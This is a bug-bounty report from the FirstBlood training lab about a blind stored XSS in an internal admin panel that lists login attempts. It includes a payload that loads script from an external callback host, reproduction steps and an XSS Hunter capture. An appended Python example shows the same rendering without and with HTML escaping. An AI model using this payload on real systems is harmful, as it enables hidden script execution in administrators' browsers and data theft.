FirstBlood-#1319 — Blind xss on FirstBloodHackers INTERNAL ADMIN PANEL
This issue was discovered on FirstBlood v3
On 2022-12-09, didsec Level 5 reported:
Hi there
I found that the internal admin page is vulnerable to a blind XSS via login attempts on login.php.
Payload:
`"><script src="https://xss.hunter"></script>`
To reproduce:
- Go to the login page
- Enter the payload in the username and password fields
- Click login
Impact
An attacker is able to access critical information from the admin panel.
XSS Hunter report below:
URL
The URL of the page the payload fired on.
`https://firstblood-helper.com/login_attempts.php?id=683`
---
IP Address
Remote IP address of the victim.
`86.145.182.70`
---
Referer
Referring page for the vulnerable page.
`https://firstblood-helper.com/login_attempts.php`
---
User-Agent
Web browser of the victim.
`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
---
Cookies
Non-HTTPOnly cookies of the victim.
_None_
---
Title
Vulnerable page's title.
`FirstBloodHackers INTERNAL ADMIN PANEL`
---
DOM/HTML
Rendered DOM of the vulnerable page.
_Page HTML too large to display inline (not included in this report)._
---
Text
Text of the vulnerable page.
```text
Logged in as
ADMINISTRATOR-SEAN
Home
Login Attempts
INTERNAL USE ONLY
Managing FirstBlood Login Attempts
The login attempt below was flagged as being potentially malicious.
ID Username Date Actions
683 ">
```
---
Origin
HTTP origin of the vulnerable page.
`https://firstblood-helper.com`
---
Browser Time
Reported time according to the victim's browser.
`Friday, December 9th 2022, 10:38:55 am (_1670582335223_)`
---
Other
Other miscellaneous information.
Fired in iFrame?: `false`
Vulnerability enumerated `Friday, December 9th 2022, 10:38:57 am`
Report ID: `11b4d0bb-58d4-4a76-be70-8431fe4be1e0`
P1 CRITICAL
FirstBlood ID: 72
Vulnerability Type: Stored XSS
Login attempts were logged on an internal panel on firstblood-helper.com, and the logged username was vulnerable to blind XSS affecting FirstBlood staff.
Creator & Administrator
CONGRATULATIONS, you were the first user to discover this bug based on login IDs. (although you were NOT the first to report it, I have concerns that some users modified earlier reports). You have won yourself a LIMITED edition BugBountyHunter HAT and a bounty. WELL DONE!!!
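As an added illustration (not FirstBlood's own code), the following Python sketch renders a login-attempts table the way the internal panel does, showing the defect class beside its fix: any stored, attacker-controlled username must be HTML-escaped when the panel renders it. The sample rows, the `LoginAttempt` type and the helper names are constructed for this example.

```python
import html
from dataclasses import dataclass


@dataclass
class LoginAttempt:
    id: int
    username: str
    date: str


# Constructed sample data: row 683 mirrors the report, where login.php logged
# the reporter's blind-XSS payload as the username of a failed login attempt.
PAYLOAD = '"><script src="https://xss.hunter"></script>'
ATTEMPTS = [
    LoginAttempt(683, PAYLOAD, "2022-12-09"),
    LoginAttempt(684, "alice", "2022-12-09"),
]


def render_row_vulnerable(a: LoginAttempt) -> str:
    # Defect: the stored username is interpolated straight into HTML, so the
    # payload closes the cell and the staff member's browser runs the script.
    return (f'<tr><td>{a.id}</td><td>{a.username}</td><td>{a.date}</td>'
            f'<td><a href="?id={a.id}">view</a></td></tr>')


def render_row_fixed(a: LoginAttempt) -> str:
    # Fix: contextual output encoding of every untrusted value. quote=True also
    # encodes the double quote the payload relies on to break out of the cell.
    return (f'<tr><td>{a.id}</td><td>{html.escape(a.username, quote=True)}</td>'
            f'<td>{html.escape(a.date, quote=True)}</td>'
            f'<td><a href="?id={a.id}">view</a></td></tr>')


def render_table(rows, render_row) -> str:
    head = "<tr><th>ID</th><th>Username</th><th>Date</th><th>Actions</th></tr>"
    return "<table>" + head + "".join(render_row(r) for r in rows) + "</table>"


def contains_live_script(markup: str) -> bool:
    # Crude check for the test: a raw <script tag in the output means the stored
    # payload would execute in the panel; an escaped one (&lt;script) would not.
    return "<script" in markup.lower()
```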